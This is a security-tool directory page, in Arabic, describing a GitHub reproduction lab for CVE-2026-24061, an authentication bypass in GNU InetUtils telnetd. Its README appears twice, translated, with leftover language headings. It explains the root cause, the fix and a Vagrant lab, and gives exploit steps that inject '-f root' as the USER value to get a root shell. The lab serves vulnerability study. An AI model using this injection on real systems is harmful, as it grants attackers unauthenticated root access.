Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-24061-lab — مختبر إعادة إنتاج لـ CVE-2026-24061، وهو تجاوز للمصادقة في GNU InetUtils telnetd. يوفر بيئة معزولة قائمة على Vagrant وتعليمات استغلال خطوة بخطوة لإظهار الوصول إلى جذر الصدفة (root shell). | Kitploit
أدوات/GitHubGitHub/akpmarcelin/cve-2026-24061-lab
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالمصادقةالتعلم والتعليممختبرات وتدريب عملي
GitHubakpmarcelin/cve-2026-24061-lab

CVE-2026-24061-lab

مختبر إعادة إنتاج لـ CVE-2026-24061، وهو تجاوز للمصادقة في GNU InetUtils telnetd. يوفر بيئة معزولة قائمة على Vagrant وتعليمات استغلال خطوة بخطوة لإظهار الوصول إلى جذر الصدفة (root shell).

عرض المستودع
1منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-24061 — مختبر إعادة الإنتاج

⚠️ لأغراض تعليمية فقط. بيئة معملية معزولة.

الفرنسية أدناه


الملخص

تجاوز حرج للمصادقة (CVSS 9.8) في GNU InetUtils telnetd ≤ 2.7. من خلال حقن -f root كقيمة لمتغير USER عبر خيار Telnet NEW_ENVIRON، يستطيع مهاجم غير مصادَق الحصول على shell root دون أي كلمة مرور.

السبب الجذري

يُمرَّر متغير USER المستلَم من العميل أثناء التفاوض عبر Telnet مباشرة إلى /usr/bin/login دون تعقيم:

root@kitploit:~
/usr/bin/login -p -f root

يخبر الخيار -f الأمر login بتخطي التحقق من كلمة المرور للمستخدم المعني. هذا السلوك موثّق في RFC 1572 (القسم 7) كخطر معروف — ومع ذلك بقيت الثغرة موجودة في inetutils لأكثر من عقد.

الإصدارات المتأثرة

GNU InetUtils telnetd 1.9.3 حتى 2.7

التصحيح

قم بالترقية إلى GNU InetUtils ≥ 2.7-2

إعداد المختبر

يستخدم هذا المختبر Vagrant لتجهيز جهاز افتراضي حقيقي ومعزول يشغّل الإصدار الضعيف من telnetd (inetutils 2.5، مُجمَّع من المصدر)، ليكون أقرب ما يمكن إلى بيئة حقيقية.

المتطلبات: تثبيت Vagrant + VirtualBox على جهازك.

root@kitploit:~
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up

يبدأ الجهاز الافتراضي بعنوان IP 192.168.56.10 ويكون telnetd في وضع الاستماع على المنفذ 23.

تم تجهيز المختبر

الاستغلال

من جهازك المضيف:

root@kitploit:~
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23

يُحقن متغير USER عبر خيار NEW_ENVIRON في Telnet أثناء مرحلة التفاوض — قبل ظهور موجه تسجيل الدخول.

الاتصال بالجهاز الافتراضي تم الحصول على shell root

المراجع

  • NVD — CVE-2026-24061
  • RFC 1572 — خيار بيئة Telnet
  • مصدر GNU InetUtils — telnetd/sys_term.c

المؤلف

Agokoli



CVE-2026-24061 — مختبر العرض التوضيحي

⚠️ استخدام تعليمي فقط. بيئة معزولة.

الإنجليزية أعلاه


الملخص

تجاوز حرج للمصادقة (CVSS 9.8) في GNU InetUtils telnetd ≤ 2.7. من خلال حقن -f root كقيمة لمتغير USER عبر خيار Telnet NEW_ENVIRON، يستطيع مهاجم غير مصادَق الحصول على shell root دون أي كلمة مرور.

السبب الجذري

يُمرَّر متغير USER المستلَم من العميل أثناء التفاوض عبر Telnet مباشرة إلى /usr/bin/login دون تحقق:

root@kitploit:~
/usr/bin/login -p -f root

يخبر الخيار -f الأمر login بعدم التحقق من كلمة المرور للمستخدم المعني. هذا الخطر موثّق في RFC 1572 (القسم 7) — ومع ذلك بقيت الثغرة موجودة في inetutils لأكثر من عقد.

الإصدارات المتأثرة

GNU InetUtils telnetd 1.9.3 حتى 2.7

التصحيح

قم بالتحديث إلى GNU InetUtils ≥ 2.7-2

إعداد المختبر

يستخدم هذا المختبر Vagrant لتجهيز جهاز افتراضي حقيقي ومعزول يشغّل الإصدار الضعيف من telnetd (inetutils 2.5، مُجمَّع من المصدر)، ليكون أقرب ما يمكن إلى بيئة حقيقية.

المتطلبات: تثبيت Vagrant + VirtualBox على جهازك.

root@kitploit:~
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up

يبدأ الجهاز الافتراضي بعنوان IP 192.168.56.10 ويكون telnetd في وضع الاستماع على المنفذ 23.

تم تجهيز المختبر

الاستغلال

من جهازك المضيف:

root@kitploit:~
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23

يُحقن متغير USER عبر خيار NEW_ENVIRON في بروتوكول Telnet أثناء مرحلة التفاوض — حتى قبل ظهور الموجه login:.

الاتصال بالجهاز الافتراضي تم الحصول على shell root

المراجع

  • NVD — CVE-2026-24061
  • RFC 1572 — خيار بيئة Telnet
  • الكود المصدري لـ GNU InetUtils — telnetd/sys_term.c

المؤلف

Agokoli

تنزيل الأداة